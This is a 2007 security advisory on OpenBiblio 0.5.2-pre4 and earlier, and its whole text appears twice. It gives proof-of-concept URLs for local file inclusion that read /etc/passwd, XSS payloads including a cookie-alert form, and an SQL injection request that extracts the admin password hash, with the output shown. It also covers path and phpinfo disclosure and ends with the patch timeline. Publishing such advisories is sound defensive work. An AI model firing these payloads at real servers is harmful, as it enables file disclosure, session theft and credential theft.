OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities
2007/12/29 01:10
- Security Advisory -
- OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities -
----------------------------------------------------
Product: OpenBiblio
Version: Version 0.5.2 Prerelease 4 and prior is affected
Url: http://obiblio.sourceforge.net/
Affected by: Full path disclosure, local file include, phpinfo
disclosure, multiple Cross Site Scripting, SQL injection
I. Introduction.
OpenBiblio is an easy to use, automated library system written in PHP
containing OPAC, circulation,
cataloging, and staff administration functionality.
OpenBiblio library administration offers an intuitive interface with
broad category tabs and sidebar.
II. Description
OpenBiblio suffers multiple bugs.
1) Local File Include vulnerability: its posible to include any
arbitrary local file using shared/help.php file
- Code -
if (isset($_GET["page"])) {
$page = $_GET["page"];
} else {
$page = "contents";
}
include("../locale/".OBIB_LOCALE."/help/".$page.".php");
- PoC -
http://site/openbiblio/shared/help.php?page=../../../../../../etc/passwd
%00
2) Local File Include (2) (only works with register_globals On and
for non php files magic_quotes_gpc must be Off)
- Code -
<?php include("../navbars/".$tab.".php");?>
- PoC -
http://site/openbiblio/shared/header.php?tab=../../../etc/passwd%00
3) This link will show phpinfo
http://site/openbiblio/phpinfo.php
Remove it!
4) Path Disclosure
Some samples:
http://site/openbiblio/shared/footer.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/shared/footer.php on line 18
http://site/openbiblio/circ/mbr_fields.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/circ/mbr_fields.php on line 14
http://site/openbiblio/admin/custom_marc_form_fields.php
Fatal error: Cannot instantiate non-existent class: dmquery in
/httpdocs/openbiblio/admin/custom_marc_form_fields.php on line 14
Please, turn display_errors to Off in php.ini
6) Multiple Cross Site Scripting, an attacker can perform an XSS
attack that allows him to access the targeted user cookies
Some samples:
http://site/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRS
T=[XSS]
http://site/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS]
In /admin/theme_preview.php an attacker can inject an XSS in the var
themeName with method POST.
here is a poc:
<form action=" http://site/openbiblio/admin/theme_preview.php" method="post">
<input type="text" name="themeName" size="40" value="<script>alert(
document.cookie);</script>"><br><br>
<input type="submit" value="doit">
</form>
try with: <script>alert(document.cookie);</script>
6) SQL injection (session with report rol is needed to exploit this bug)
Any user with report rol can access any field of the database,
including admin md5 hash.
http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balance
DueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++
with this an attacker can get the md5 admin password:
http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balance
DueList&title=Balance+Due+Member+List&sql=%0A++++select+username,pwd+fro
m+staff%20where+userid=1%0A++
then click "run report" and view the results, besides, you can choose
between html and csv format ;)
staff.username staff.pwd
admin 21232f297a57a5a743894a0e4a801fc3
III. Timeline
20/08/2006 - Bugs discovered
25/08/2006 - Vendor Contacted
30/08/2006 - Release 0.5.2 (parcial patch)
21/02/2007 - Release 0.6.0 (full patch)
28/12/2007 - Advisory Disclosure
IV. Solution
Upgrade to 0.6.0 from http://obiblio.sourceforge.net/
Good work! :)
V. Credits
Juan Galiana <jgaliana gmail com>
Regards
- OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities -
----------------------------------------------------
Product: OpenBiblio
Version: Version 0.5.2 Prerelease 4 and prior is affected
Url: http://obiblio.sourceforge.net/
Affected by: Full path disclosure, local file include, phpinfo
disclosure, multiple Cross Site Scripting, SQL injection
I. Introduction.
OpenBiblio is an easy to use, automated library system written in PHP
containing OPAC, circulation,
cataloging, and staff administration functionality.
OpenBiblio library administration offers an intuitive interface with
broad category tabs and sidebar.
II. Description
OpenBiblio suffers multiple bugs.
1) Local File Include vulnerability: its posible to include any
arbitrary local file using shared/help.php file
- Code -
if (isset($_GET["page"])) {
$page = $_GET["page"];
} else {
$page = "contents";
}
include("../locale/".OBIB_LOCALE."/help/".$page.".php");
- PoC -
http://site/openbiblio/shared/help.php?page=../../../../../../etc/passwd
%00
2) Local File Include (2) (only works with register_globals On and
for non php files magic_quotes_gpc must be Off)
- Code -
<?php include("../navbars/".$tab.".php");?>
- PoC -
http://site/openbiblio/shared/header.php?tab=../../../etc/passwd%00
3) This link will show phpinfo
http://site/openbiblio/phpinfo.php
Remove it!
4) Path Disclosure
Some samples:
http://site/openbiblio/shared/footer.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/shared/footer.php on line 18
http://site/openbiblio/circ/mbr_fields.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/circ/mbr_fields.php on line 14
http://site/openbiblio/admin/custom_marc_form_fields.php
Fatal error: Cannot instantiate non-existent class: dmquery in
/httpdocs/openbiblio/admin/custom_marc_form_fields.php on line 14
Please, turn display_errors to Off in php.ini
6) Multiple Cross Site Scripting, an attacker can perform an XSS
attack that allows him to access the targeted user cookies
Some samples:
http://site/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRS
T=[XSS]
http://site/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS]
In /admin/theme_preview.php an attacker can inject an XSS in the var
themeName with method POST.
here is a poc:
<form action=" http://site/openbiblio/admin/theme_preview.php" method="post">
<input type="text" name="themeName" size="40" value="<script>alert(
document.cookie);</script>"><br><br>
<input type="submit" value="doit">
</form>
try with: <script>alert(document.cookie);</script>
6) SQL injection (session with report rol is needed to exploit this bug)
Any user with report rol can access any field of the database,
including admin md5 hash.
http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balance
DueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++
with this an attacker can get the md5 admin password:
http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balance
DueList&title=Balance+Due+Member+List&sql=%0A++++select+username,pwd+fro
m+staff%20where+userid=1%0A++
then click "run report" and view the results, besides, you can choose
between html and csv format ;)
staff.username staff.pwd
admin 21232f297a57a5a743894a0e4a801fc3
III. Timeline
20/08/2006 - Bugs discovered
25/08/2006 - Vendor Contacted
30/08/2006 - Release 0.5.2 (parcial patch)
21/02/2007 - Release 0.6.0 (full patch)
28/12/2007 - Advisory Disclosure
IV. Solution
Upgrade to 0.6.0 from http://obiblio.sourceforge.net/
Good work! :)
V. Credits
Juan Galiana <jgaliana gmail com>
Regards
